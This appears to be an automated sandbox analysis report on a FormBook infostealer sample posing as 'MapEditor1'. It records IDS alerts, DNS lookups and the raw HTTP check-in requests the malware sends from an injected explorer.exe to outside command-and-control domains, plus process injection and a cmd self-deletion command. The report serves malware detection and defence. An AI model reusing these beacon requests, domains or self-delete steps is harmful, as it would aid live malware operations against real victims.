                                                            LegalTrademarks |
                                                            Comments |
                                                            ProductName | MapEditor1
                                                            ProductVersion | 1.0.0.0
                                                            FileDescription | MapEditor1
                                                            OriginalFilename | DictionaryEnumerat.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                            10/13/21-13:39:27.811719 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
                                                            10/13/21-13:39:28.079722 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49827 | 80 | 192.168.2.6 | 154.216.110.149
                                                            10/13/21-13:39:28.079722 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49827 | 80 | 192.168.2.6 | 154.216.110.149
                                                            10/13/21-13:39:28.079722 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49827 | 80 | 192.168.2.6 | 154.216.110.149

                                                            Network Port Distribution

                                                            TCP Packets


                                                            UDP Packets


                                                            ICMP Packets

                                                            Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                                            Oct 13, 2021 13:39:27.811718941 CEST | 192.168.2.6 | 8.8.8.8 | d005 | (Port unreachable) | Destination Unreachable

                                                            DNS Queries

                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                            Oct 13, 2021 13:39:00.196365118 CEST | 192.168.2.6 | 8.8.8.8 | 0x6a87 | Standard query (0) | www.iphone13promax.design | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:05.286163092 CEST | 192.168.2.6 | 8.8.8.8 | 0x69e9 | Standard query (0) | www.vintagepaseo.com | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:11.041781902 CEST | 192.168.2.6 | 8.8.8.8 | 0x9cd5 | Standard query (0) | www.brandmty.net | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:16.125418901 CEST | 192.168.2.6 | 8.8.8.8 | 0xda7 | Standard query (0) | www.xn--aprendes-espaol-brb.com | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:21.413523912 CEST | 192.168.2.6 | 8.8.8.8 | 0x1561 | Standard query (0) | www.districonio.com | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:26.461357117 CEST | 192.168.2.6 | 8.8.8.8 | 0x9ea6 | Standard query (0) | www.cyebang.com | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:27.473282099 CEST | 192.168.2.6 | 8.8.8.8 | 0x9ea6 | Standard query (0) | www.cyebang.com | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:33.414989948 CEST | 192.168.2.6 | 8.8.8.8 | 0x18ce | Standard query (0) | www.umdasch-lagertechnik.com | A (IP address) | IN (0x0001)

                                                            DNS Answers

                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                            Oct 13, 2021 13:38:13.648951054 CEST | 8.8.8.8 | 192.168.2.6 | 0x17ae | No error (0) | windowsupdate.s.llnwi.net | | 178.79.242.0 | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:00.275882006 CEST | 8.8.8.8 | 192.168.2.6 | 0x6a87 | Server failure (2) | www.iphone13promax.design | none | none | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:05.422707081 CEST | 8.8.8.8 | 192.168.2.6 | 0x69e9 | No error (0) | www.vintagepaseo.com | | 208.91.197.27 | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:11.082210064 CEST | 8.8.8.8 | 192.168.2.6 | 0x9cd5 | Name error (3) | www.brandmty.net | none | none | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:16.155879974 CEST | 8.8.8.8 | 192.168.2.6 | 0xda7 | No error (0) | www.xn--aprendes-espaol-brb.com | | 217.160.0.226 | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:21.450542927 CEST | 8.8.8.8 | 192.168.2.6 | 0x1561 | Name error (3) | www.districonio.com | none | none | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:27.798012018 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ea6 | No error (0) | www.cyebang.com | | 154.216.110.149 | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:27.811642885 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ea6 | No error (0) | www.cyebang.com | | 154.216.110.149 | A (IP address) | IN (0x0001)
                                                            Oct 13, 2021 13:39:33.463068962 CEST | 8.8.8.8 | 192.168.2.6 | 0x18ce | Name error (3) | www.umdasch-lagertechnik.com | none | none | A (IP address) | IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.vintagepaseo.com
                                                            • www.xn--aprendes-espaol-brb.com
                                                            • www.cyebang.com

                                                            HTTP Packets

                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            0 | 192.168.2.6 | 49805 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Oct 13, 2021 13:39:05.577222109 CEST | 6005 | OUT | GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.vintagepaseo.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:05.854733944 CEST | 6006 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 13 Oct 2021 11:39:05 GMT
                                                            Server: Apache
                                                            Set-Cookie: vsid=917vr3816707456615690; expires=Mon, 12-Oct-2026 11:39:05 GMT; Max-Age=157680000; path=/; domain=www.vintagepaseo.com; HttpOnly
                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BvmoE1YFCm+tBN52SitLTqdTVO+b/MNnOMS6bzT4FdAriOe/RlkeAXaeSbohmAblVkfZ8kWSX7V6WunDyRriUQ==
                                                            Keep-Alive: timeout=5, max=125
                                                            Connection: Keep-Alive
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Ascii: 4f91<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BvmoE1YFCm+tBN52SitLTqdTVO+b/MNnOMS6bzT4FdAriOe/RlkeAXaeSbohmAblVkfZ8kWSX7V6WunDyRriUQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.vintagepaseo.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.vintagepaseo.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglo
                                                            Oct 13, 2021 13:39:05.854760885 CEST6007INData Raw: 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d
                                                            Data Ascii: g.style.width="0px";imglog.src="http://www.vintagepaseo.com/sk-logabpstatus.php?a=QmIvZDVoc29MTkswZ3hUV0xyKzRlVjRFaXpxUVQxZ0pPZXFmU3l5bmFKSENjc2F1S1BRMyswU2VQQWpZaDhueS9VUnhNV2hlaEpWdTFDNDlxdEozR2ptRHZMMS9QZEg0L0JQaXU4SnpVaEFyOU9pdDRFRnFBTExaW
                                                            Oct 13, 2021 13:39:05.854775906 CEST6009INData Raw: 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6f 70 65 6e 2d 73 61 6e 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 6f 74 66 22 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29
                                                            Data Ascii: tp://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf") format("opentype"),url("http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans") format("svg");font-weight: normal;font-style: normal;font-display: swap;}@font
                                                            Oct 13, 2021 13:39:05.854795933 CEST6010INData Raw: 66 69 78 7b 7a 6f 6f 6d 3a 31 7d 0d 0a 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 0a 20 20 6f 70 65 6e 2d 73 61 6e 73 20 0a 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 62 61 63 6b 67 72 6f 75
                                                            Data Ascii: fix{zoom:1}body{font-family: open-sans ,sans-serif;font-size:12px; background:#fff;font-weight: 400;background: url(http://i4.cdn-image.com/__media__/pics/27587/BG_2.png) no-repeat center bottom; background-size: cover;background-attach
                                                            Oct 13, 2021 13:39:05.854813099 CEST6011INData Raw: 69 7a 65 3a 20 31 32 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 0d 0a 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 38 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 7d 0d 0a
                                                            Data Ascii: ize: 12px; text-decoration: underline}.container{width:800px;margin:0 auto;}.searchbox{float:right; width:400px; height:37px;}.srch-txt{float: left; width: 343px; height: 37px; padding:0 10px;font-size: 16px; background: #fff; color: #
                                                            Oct 13, 2021 13:39:05.854831934 CEST6013INData Raw: 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 32 70 78 7d 0d 0a 2e 6b 77 64 5f 62 6c 6f 61
                                                            Data Ascii: isplay:block; word-wrap: break-word; padding: 15px;border-radius: 12px}.kwd_bloack ul li a:hover{background-color:#0b8040;color: #fff}.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:100%;
                                                            Oct 13, 2021 13:39:05.854851961 CEST6014INData Raw: 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 74 6f 70 3a 20 75 6e 73 65 74 3b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f
                                                            Data Ascii: rgin-bottom: 10px;text-align: center;position: relative; top: unset; transform: none;} .msgright{width: 100%;text-align: center} .top-strip{margin-bottom: 40px} .logo-img-wrap{float:none;width:auto} .searchbox{margin:0; f
                                                            Oct 13, 2021 13:39:05.854870081 CEST6015INData Raw: 61 63 79 20 6c 69 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20 75 6c 2e 70 72 69 76 61 63 79 20 6c 69 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20
                                                            Data Ascii: acy li{display: block;font-size: 12px} ul.privacy li a{font-size: 12px} .msgright .expMsg, .backorder, .msgright .expMsg a{font-size: 12px} .related-searches-custom{font-size: 14px} }</style><script language="JavaScript"
                                                            Oct 13, 2021 13:39:05.854887009 CEST6017INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 64 65 73 69 67 6e 2f 75 6e 64 65 72 63 6f 6e 73 74 72 75 63 74 69 6f 6e 6e 6f 74 69 63 65 2e 70 68 70 3f 64 3d 76 69 6e 74 61 67
                                                            Data Ascii: "http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.com" onClick="return popup(this, 'notes')"> Why am I seeing this 'Under Construction' page?</a></p> <div class="expMsg">
                                                            Oct 13, 2021 13:39:05.854902983 CEST6018INData Raw: 76 65 72 3d 22 63 68 61 6e 67 65 53 74 61 74 75 73 28 27 4d 69 67 72 61 69 6e 65 20 50 61 69 6e 20 52 65 6c 69 65 66 27 29 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 22 20 6f 6e 6d 6f 75 73 65 6f 75 74 3d 22 63 68 61 6e 67 65 53 74 61 74 75 73 28 27
                                                            Data Ascii: ver="changeStatus('Migraine Pain Relief');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showPop) != 'undefined')showPop=0;return modifyKeywordClickURL(this, 'kwclk');;" title="Migraine Pain Relief" id="dk1" name="
                                                            Oct 13, 2021 13:39:06.001059055 CEST6020INData Raw: 37 48 30 47 7a 4c 41 33 50 74 57 4c 72 4d 25 32 42 64 67 65 56 7a 79 78 4c 55 52 6b 57 38 7a 66 4a 49 70 4b 69 25 32 42 5a 72 39 30 39 55 53 32 46 4a 54 50 56 39 55 51 44 61 25 32 46 39 5a 59 78 6c 32 34 6a 57 43 4f 4f 55 49 25 32 46 56 43 74 30
                                                            Data Ascii: 7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%2BZr909US2FJTPV9UQDa%2F9ZYxl24jWCOOUI%2FVCt08AtxLf3jeKDClULqVLVsnfntpsBZh4B8%2FGlDa7YsDwIzgK4Bp%2ByxFLyhbqyCx5Lya0y09XaBKCORwW8QSWsTqXsI73FPg6BcjnWJsBlVxeg4MsDuMMnrcWibjZmLqS%2Br4BYEd47gvdW3cFz3inq%2BE9dKD


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            1 | 192.168.2.6 | 49826 | 217.160.0.226 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Oct 13, 2021 13:39:16.181458950 CEST | 6077 | OUT | GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.xn--aprendes-espaol-brb.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:16.395705938 CEST | 6078 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 13 Oct 2021 11:39:16 GMT
                                                            Server: Apache
                                                            X-Powered-By: PHP/7.4.24
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            2 | 192.168.2.6 | 49827 | 154.216.110.149 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Oct 13, 2021 13:39:28.079721928 CEST | 6079 | OUT | GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.cyebang.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:28.372508049 CEST | 6081 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html; charset=UTF-8
                                                            Server: Microsoft-IIS/8.5
                                                            X-Powered-By: PHP/5.6.40
                                                            X-Powered-By: ASP.NET
                                                            Date: Wed, 13 Oct 2021 11:39:24 GMT
                                                            Connection: close
                                                            Content-Length: 1245


                                                            System Behavior

                                                            General

                                                            Start time:13:37:28
                                                            Start date:13/10/2021
                                                            Path:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\iAuPyHuUkk.exe'
                                                            Imagebase:0xf00000
                                                            File size:698880 bytes
                                                            MD5 hash:6040407905EA1AA24DD58DC8BEFA4255
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.370638895.00000000033C1000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:13:37:37
                                                            Start date:13/10/2021
                                                            Path:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Imagebase:0xbc0000
                                                            File size:698880 bytes
                                                            MD5 hash:6040407905EA1AA24DD58DC8BEFA4255
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:13:37:38
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff6f22f0000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:13:38:07
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\autofmt.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                            Imagebase:0x12e0000
                                                            File size:831488 bytes
                                                            MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:13:38:14
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\control.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\control.exe
                                                            Imagebase:0xd20000
                                                            File size:114688 bytes
                                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:13:38:18
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
                                                            Imagebase:0x2a0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:13:38:19
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis


                                                              Executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C630
                                                              • GetCurrentThread.KERNEL32 ref: 01A4C66D
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C6AA
                                                              • GetCurrentThreadId.KERNEL32 ref: 01A4C703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C630
                                                              • GetCurrentThread.KERNEL32 ref: 01A4C66D
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C6AA
                                                              • GetCurrentThreadId.KERNEL32 ref: 01A4C703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01A4A516
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A4C87F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A4A591,00000800,00000000,00000000), ref: 01A4A7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A4C87F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A4A591,00000800,00000000,00000000), ref: 01A4A7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A4A591,00000800,00000000,00000000), ref: 01A4A7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
